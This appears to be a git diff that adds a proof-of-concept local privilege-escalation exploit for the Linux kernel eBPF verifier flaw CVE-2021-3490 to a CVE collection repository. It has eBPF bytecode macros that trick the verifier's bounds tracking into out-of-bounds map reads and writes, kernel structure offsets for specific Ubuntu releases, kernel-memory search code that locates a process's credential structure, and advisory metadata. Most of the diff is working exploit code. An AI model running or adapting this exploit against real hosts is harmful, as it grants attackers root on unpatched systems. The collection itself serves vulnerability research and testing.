primitive is an eBPF program contained into two parts. The first part only triggers the bug, where EXPLOIT_REG will have incorrect 32 bit bounds (u32_min_value=1,u32_max_value=0). +// The second part causes the eBPF verifier to believe EXPLOIT_REG has a value of 0 but actually has a runtime value of 1. It is split into two parts because we only need the first part to leak +// the pointer to the BPF array map used for OOB read/writes. + +#define exploit_primitive_pt1(oob_map_fd, store_map_fd) \ +/* load oob_map values ptr into reg_0 */ \ +BPF_MOV64_IMM(BPF_REG_0, 0), \ +BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \ +BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ +BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ +BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd), \ +BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ +/* check if the returned map value pointer is valid */ \ +BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ +BPF_EXIT_INSN(), \ +/* save oob map value ptr into preserved register reg_7 */ \ +BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \ +/* load store_map values ptr into reg_0 */ \ +BPF_MOV64_IMM(BPF_REG_0, 0), \ +BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \ +BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \ +BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \ +BPF_LD_MAP_FD(BPF_REG_1, store_map_fd), \ +BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ +/* check if the returned map value pointer is valid */ \ +BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \ +BPF_EXIT_INSN(), \ +/* store the map value pointer into designated register */ \ +BPF_MOV64_REG(STORE_MAP_REG, BPF_REG_0),\ +/* save the oob map value pointer in the designated register */ \ +BPF_MOV64_REG(OOB_MAP_REG, BPF_REG_7), \ +/* prepare return value in reg_0 */ \ +BPF_MOV32_IMM(BPF_REG_0, 0), \ +/* load "unknown" value from the map, the real runtime value is 0 */ \ +BPF_LDX_MEM(BPF_DW, UNKOWN_VALUE_REG, STORE_MAP_REG, 0), \ +/* load "unknown" value into exploit register so it begins with a tnum mask of 0xFFFFFFFFFFFFFFFF */ \ +BPF_MOV64_REG(EXPLOIT_REG, UNKOWN_VALUE_REG), \ +/* constant register value is 0xFFFFFFFF */ \ +BPF_MOV32_IMM(CONST_REG, 0xFFFFFFFF), \ +/* constant register value is 0xFFFFFFFF00000000 */ \ +BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \ +/* exploit register has tnum mask of 0xFFFFFFFF00000000 since now the bottom 32 bits are known to be 0 */ \ +BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG), \ +/* exploit register has tnum value 0x1 and mask of 0xFFFFFFFF00000000 */ \ +BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \ +/* constant register value is 0x1 */ \ +BPF_MOV64_IMM(CONST_REG, 0x1), \ +/* constant register value is 0x100000000 */ \ +BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \ +/* constant register value is 0x100000002 */ \ +BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2), \ +/* trigger the bug, exploit register has u32_min_value=1,u32_max_value=0 */ \ +BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG) + +#define exploit_primitive_pt2 \ +/* exploit register has u32_min_value=2,u32_max_value=1 */ \ +BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \ +/* conditional so that unknown value register has u32_min_value=0,u32_max_value=1 */ \ +BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1), \ +BPF_EXIT_INSN(), \ +/* bounds from each register are added, exploit reg now has u32_min_value=u32_max_value=2, verifier believes lower 32 bits are constant and equal to 2 */ \ +BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKOWN_VALUE_REG), \ +/* clear the top 32 bits, verifier believes exploit reg is constant value of 2 (during runtime the value is 1) */ \ +BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \ +/* verifier believes exploit register is 0, because 2 & 1 = 0, runtime value is still 1 */ \ +BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1), \ +/* make a copy of exploit register to do dummy map operations */\ +BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), \ +/* add a constant value to map value pointer to set alu_limit = DUMMY_MAP_ADD, to bypass runtime ALU sanitation */ \ +BPF_ALU64_IMM(BPF_ADD, OOB_MAP_REG, DUMMY_MAP_ADD), \ +/* copy register value is DUMMY_MAP_ADD - 1, verifier believes it is 0 */\ +BPF_ALU64_IMM(BPF_MUL, COPY_REG, DUMMY_MAP_ADD - 1), \ +/* subtract DUMMY_MAP_ADD we just added to map value pointer, because verifier believes copy register is 0, alu_limit remains unchanged */ \ +BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, COPY_REG), \ +/* subtract the remaining byte, so runtime ALU sanitation checks are passed on versions not patched for CVE-2020-27171 */ \ +BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG) + + +int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h b/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h new file mode 100644 index 00000000..345ced72 --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/kernel_defs.h @@ -0,0 +1,160 @@ +#ifndef _KERNEL_DEFS__H_ +#define _KERNEL_DEFS__H_ + +#define KERNEL_BASE 0xFFFF000000000000 +#define KERNEL_DS 0xFFFFFFFFFFFFFFFF +#define IS_KERNEL_POINTER(x) (((x > KERNEL_BASE) && (x < KERNEL_DS))?1:0) + +// Backwards offset of ops field in bpf_map from start of map values memory chunk +#define BPF_MAP_OPS_OFFSET 0x110 +// Backwards offset of btf field in bpf_map from start map values memory chunk +#define BPF_MAP_BTF_OFFSET 0xD0 +// Backwards offset of spin_lock_off field in bpf_map from start of map values memory chunk +#define BPF_MAP_SPIN_LOCK_OFF_OFFSET 0xE4 +// Backwards offset of max_entries field in bpf_map from start of map values memory chunk +#define BPF_MAP_MAX_ENTRIES_OFFSET 0xEC +// Backwards offset of map_type field in bpf_map from start of map values memory chunk +#define BPF_MAP_TYPE_OFFSET 0xF8 + +// Offset of map_get_next_key function pointer in bpf_map_ops +#define MAP_OPS_GET_NEXT_KEY_OFFSET 0x20 +// Offset of map_push_elem function pointer in bpf_map_ops +#define MAP_OPS_PUSH_ELEM_OFFSET 0x70 + +// Offset of id field in btf struct +#define BTF_ID_OFFSET 0x58 + +// Offset of tasks field in pid structure +#define PID_TASKS_OFFSET 0x10 + +// Offset of linked list entry in task_struct +#ifdef GROOVY +#define TASK_LIST_OFFSET 0x950 +#endif +#ifdef HIRSUTE +#define TASK_LIST_OFFSET 0x578 +#endif +// Offset of cred pointer in task_struct +#ifdef GROOVY +#define TASK_CRED_OFFSET 0xA88 +#endif +#ifdef HIRSUTE +#define TASK_CRED_OFFSET 0x6C8 +#endif + +// Offset of uid field in cred structure +#define CRED_UID_OFFSET 0x4 +// Offset of gid field in cred structure +#define CRED_GID_OFFSET 0x8 +// Offset of euid field in cred structure +#define CRED_EUID_OFFSET 0x14 + + +// Copied from Linux Kernel source + +#define XA_CHUNK_SHIFT 0x6 +#define XA_CHUNK_SIZE 0x40 + +#define XA_RETRY_ENTRY xa_mk_internal(256) + +#define RADIX_TREE_RETRY XA_RETRY_ENTRY +#define RADIX_TREE_MAP_SHIFT XA_CHUNK_SHIFT +#define RADIX_TREE_MAP_SIZE (1UL << RADIX_TREE_MAP_SHIFT) +#define RADIX_TREE_MAP_MASK (RADIX_TREE_MAP_SIZE-1) + + +/* + * The bottom two bits of the slot determine how the remaining bits in the + * slot are interpreted: + * + * 00 - data pointer + * 10 - internal entry + * x1 - value entry + * + * The internal entry may be a pointer to the next level in the tree, a + * sibling entry, or an indicator that the entry in this slot has been moved + * to another location in the tree and the lookup should be restarted. While + * NULL fits the 'data pointer' pattern, it means that there is no entry in + * the tree for this index (no matter what level of the tree it is found at). + * This means that storing a NULL entry in the tree is the same as deleting + * the entry from the tree. + */ +#define RADIX_TREE_ENTRY_MASK 3UL +#define RADIX_TREE_INTERNAL_NODE 2UL + + +/** + * struct xarray - The anchor of the XArray. + * @xa_lock: Lock that protects the contents of the XArray. + * + * To use the xarray, define it statically or embed it in your data structure. + * It is a very small data structure, so it does not usually make sense to + * allocate it separately and keep a pointer to it in your data structure. + * + * You may use the xa_lock to protect your own data structures as well. + */ +/* + * If all of the entries in the array are NULL, @xa_head is a NULL pointer. + * If the only non-NULL entry in the array is at index 0, @xa_head is that + * entry. If any other entry in the array is non-NULL, @xa_head points + * to an @xa_node. + */ +struct xarray +{ + int32_t xa_lock; + int32_t xa_flags; + void *xa_head; +}; + + +/* + * xa_mk_internal() - Create an internal entry. + * @v: Value to turn into an internal entry. + * + * Internal entries are used for a number of purposes. Entries 0-255 are + * used for sibling entries (only 0-62 are used by the current code). 256 + * is used for the retry entry. 257 is used for the reserved / zero entry. + * Negative internal entries are used to represent errnos. Node pointers + * are also tagged as internal entries in some situations. + * + * Context: Any context. + * Return: An XArray internal entry corresponding to this value. + */ +static inline void *xa_mk_internal(unsigned long v) +{ + return (void *)((v << 2) | 2); +} + +#define radix_tree_root xarray +#define radix_tree_node xa_node + + +struct xa_node +{ + unsigned char shift; /* Bits remaining in each slot */ + unsigned char offset; /* Slot offset in parent */ + unsigned char count; /* Total entry count */ + unsigned char nr_values; /* Value entry count */ + struct xa_node *parent; /* NULL at top of tree */ + struct xarray *array; /* The array we belong to */ + char filler[0x10]; + void *slots[XA_CHUNK_SIZE]; +}; + +struct idr +{ + struct radix_tree_root idr_rt; + unsigned int idr_base; + unsigned int idr_next; +}; + +struct pid_namespace +{ +#ifdef GROOVY + uint64_t padding; +#endif + struct idr idr; +}; + + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h b/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h new file mode 100644 index 00000000..961dac9e --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/include/kmem_search.h @@ -0,0 +1,12 @@ +#ifndef _KMEM_SEARCH_H_ +#define _KMEM_SEARCH_H_ + +#include "exploit_configs.h" + +#define KMEM_MAX_SEARCH 0xFFFFFFF + +int search_init_pid_ns_kstrtab(exploit_context* pCtx); +int search_init_pid_ns_ksymtab(exploit_context* pCtx); +int find_pid_cred(exploit_context* pCtx, pid_t pid); + +#endif \ No newline at end of file diff --git a/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c b/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c new file mode 100644 index 00000000..a49645ae --- /dev/null +++ b/cve/linux-kernel/2021/CVE-2021-3490/kmem_search.c @@ -0,0 +1,276 @@ +#include +#include +#include +#include +#include +#include + +#include "kernel_defs.h" +#include "kmem_search.h" +#include "exploit_configs.h" + + +char* pKernelMemory = NULL; +uint32_t uiLen = 0; + + +// Userspace/exploit implementations of corresponding kernel functions + +static inline unsigned long shift_maxindex(unsigned int shift) +{ + return (RADIX_TREE_MAP_SIZE << shift) - 1; +} + +static inline unsigned long node_maxindex(const struct radix_tree_node *node) +{ + return shift_maxindex(node->shift); +} + +static inline struct radix_tree_node *entry_to_node(void *ptr) +{ + return (void *)((unsigned long)ptr & ~RADIX_TREE_INTERNAL_NODE); +} + +static inline bool radix_tree_is_internal_node(void *ptr) +{ + return ((unsigned long)ptr & RADIX_TREE_ENTRY_MASK) == + RADIX_TREE_INTERNAL_NODE; +} + +static unsigned int radix_tree_descend(exploit_context* pCtx, const struct radix_tree_node *parent, + struct radix_tree_node **nodep, unsigned long index) +{ + unsigned int offset = 0; + void **entry = NULL; + struct radix_tree_node node_in = {0}; + + kernel_read(pCtx, (uint64_t)parent, (char*)&node_in, sizeof(node_in)); + offset = (index >> node_in.shift) & RADIX_TREE_MAP_MASK; + + entry = node_in.slots[offset]; + + *nodep = (void *)entry; + return offset; +} + +static unsigned radix_tree_load_root(exploit_context* pCtx, const struct radix_tree_root *root, + struct radix_tree_node **nodep, unsigned long *maxindex) +{ + struct radix_tree_node *node = root->xa_head; + struct radix_tree_node node_in = {0}; + *nodep = node; + + if (radix_tree_is_internal_node(node)) + { + node = entry_to_node(node); + kernel_read(pCtx, (uint64_t)node, (char*)&node_in, sizeof(node_in)); + *maxindex = node_maxindex(&node_in); + return node_in.shift + RADIX_TREE_MAP_SHIFT; + } + + *maxindex = 0; + return 0; +} + +void *__radix_tree_lookup(exploit_context* pCtx, const struct radix_tree_root *root, + unsigned long index, struct radix_tree_node **nodep, + void ***slotp) +{ + struct radix_tree_node *node, *parent; + unsigned long maxindex; + void **slot; + struct radix_tree_node node_in = {0}; + + restart: + parent = NULL; + slot = (void **)&root->xa_head; + radix_tree_load_root(pCtx, root, &node, &maxindex); + + if (index > maxindex) + return NULL; + + while (radix_tree_is_internal_node(node)) { + unsigned offset; + + parent = entry_to_node(node); + offset = radix_tree_descend(pCtx, parent, &node, index); + kernel_read(pCtx, (uint64_t)parent, (char*)&node_in, sizeof(node_in)); + slot = node_in.slots + offset; + if (node == RADIX_TREE_RETRY) + goto restart; + if (node_in.shift == 0) + break; + } + + if (nodep) + *nodep = parent; + if (slotp) + *slotp = slot; + return node; +} + +void *radix_tree_lookup(exploit_context* pCtx, const struct radix_tree_root *root, unsigned long index) +{ + return __radix_tree_lookup(pCtx, root, index, NULL, NULL); +} + +void *idr_find(exploit_context* pCtx, const struct idr *idr, unsigned long id) +{ + return radix_tree_lookup(pCtx, &idr->idr_rt, id - idr->idr_base); +} + +struct pid *find_pid_ns(exploit_context* pCtx, int nr) +{ + struct pid_namespace ns = {0}; + + kernel_read(pCtx, pCtx->init_pid_ns, (char*)&ns, sizeof(ns)); + + return idr_find(pCtx, &ns.idr, nr); +} + +int find_pid_cred(exploit_context* pCtx, pid_t pid) +{ + int ret = -1; + uint64_t pid_struct = 0; + uint64_t first = 0; + uint64_t task = 0; + + pid_struct = (uint64_t)find_pid_ns(pCtx, pid); + + if(!IS_KERNEL_POINTER(pid_struct)) + { + goto done; + } + + kernel_read(pCtx, pid_struct + PID_TASKS_OFFSET, (char*)&first, sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(first)) + { + goto done; + } + + task = first - TASK_LIST_OFFSET; + + kernel_read(pCtx, task + TASK_CRED_OFFSET, (char*)&pCtx->cred, sizeof(uint64_t)); + + if(!IS_KERNEL_POINTER(pCtx->cred)) + { + goto done; + } + + ret = 0; + +done: + return ret; +} + +// Custom search functions + +char* strnstr_c(char *str, const char *substr, size_t n) +{ + char *p = str, *pEnd = str+n; + size_t substr_len = strlen(substr); + + if(0 == substr_len) + { + return str; + } + + pEnd -= (substr_len - 1); + + for(;p < pEnd; ++p) + { + if(0 == strncmp(p, substr, substr_len)) + { + return p; + } + } + + return NULL; +} + +int search_init_pid_ns_kstrtab(exploit_context* pCtx) +{ + int ret = -1; + char init_pid_ns[] = "init_pid_ns"; + + if(NULL == pKernelMemory) + { + pKernelMemory = malloc(PAGE_SIZE); + uiLen = PAGE_SIZE; + } + + for(uint32_t i = 0; i < KMEM_MAX_SEARCH; i+= PAGE_SIZE) + { + if(NULL == pKernelMemory) + { + printf("[-] failed to allocate memory!\n"); + goto done; + } + + if(0 != kernel_read(pCtx, pCtx->array_map_ops + i, pKernelMemory + i, PAGE_SIZE)) + { + goto done; + } + + if(0 < i) + { + char* substr = strnstr_c(pKernelMemory + i - sizeof(init_pid_ns), init_pid_ns, PAGE_SIZE + sizeof(init_pid_ns)); + + if(NULL != substr) + { + uint32_t offset = substr - pKernelMemory; + pCtx->init_pid_ns_kstrtab = pCtx->array_map_ops + offset; + ret = 0; + break; + } + } + + pKernelMemory = realloc(pKernelMemory, i + 2*PAGE_SIZE); + uiLen = i + 2*PAGE_SIZE; + } + +done: + if((0 != ret) && (NULL != pKernelMemory)) + { + free(pKernelMemory); + pKernelMemory = NULL; + } + + return ret; +} + +int search_init_pid_ns_ksymtab(exploit_context* pCtx) +{ + int ret = -1; + uint64_t pStartAddr = pCtx->array_map_ops; + + if(NULL == pKernelMemory) + { + goto done; + } + + for(uint32_t i = 0; i < uiLen; i++) + { + uint32_t offset = *(uint32_t*)(pKernelMemory + i); + + if((pStartAddr + offset) == pCtx->init_pid_ns_kstrtab) + { + uint32_t value_offset = *(uint32_t*)(pKernelMemory + i - 0x4); + pCtx-> init_pid_ns = pStartAddr + value_offset - 0x4; + ret = 0; + break; + } + + pStartAddr++; + } + +done: + if(NULL != pKernelMemory) + { + free(pKernelMemory); + pKernelMemory = NULL; + } + + return ret; +} diff --git a/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml b/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml new file mode 100644 index 00000000..60ba839b --- /dev/null +++ b/cve/linux-kernel/2021/yaml/CVE-2021-3490.yaml @@ -0,0 +1,24 @@ +id: CVE-2021-3490 +source: https://github.com/chompie1337/Linux_LPE_eBPF_CVE-2021-3490 +info: + name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 + severity: high + description: | + The eBPF ALU32 bounds tracking for bitwise ops (AND, OR and XOR) in the Linux kernel did not properly update 32-bit bounds, which could be turned into out of bounds reads and writes in the Linux kernel and therefore, arbitrary code execution. This issue was fixed via commit 049c4e13714e ("bpf: Fix alu32 const subreg bound tracking on bitwise operations") (v5.13-rc4) and backported to the stable kernels in v5.12.4, v5.11.21, and v5.10.37. The AND/OR issues were introduced by commit 3f50f132d840 ("bpf: Verifier, do explicit ALU32 bounds tracking") (5.7-rc1) and the XOR variant was introduced by 2921c90d4718 ("bpf:Fix a verifier failure with xor") ( 5.10-rc1). + scope-of-influence: + 5.10.37 ≤ linux-kernel ≤ 5.13 + reference: + - https://git.kernel.org/pub/scm/linux/kernel/git/bpf/bpf.git/commit/?id=049c4e13714ecbca567b4d5f6d563f05d431c80e + - https://security.netapp.com/advisory/ntap-20210716-0004/ + - https://ubuntu.com/security/notices/USN-4949-1 + - https://ubuntu.com/security/notices/USN-4950-1 + - https://www.openwall.com/lists/oss-security/2021/05/11/11 + - https://www.zerodayinitiative.com/advisories/ZDI-21-606/ + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2021-3490 + cwe-id: CWE-20, CWE-125, CWE-787 + cnvd-id: None + kve-id: None + tags: cve2021, 读写越界 \ No newline at end of file diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 1ed80196..c29bebce 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -14,6 +14,7 @@ cve: - CVE-2021-4204 - CVE-2021-22555 - CVE-2021-4154 + - CVE-2021-3490 - CVE-2022-34918 - CVE-2022-2639 - CVE-2022-0847 -- Gitee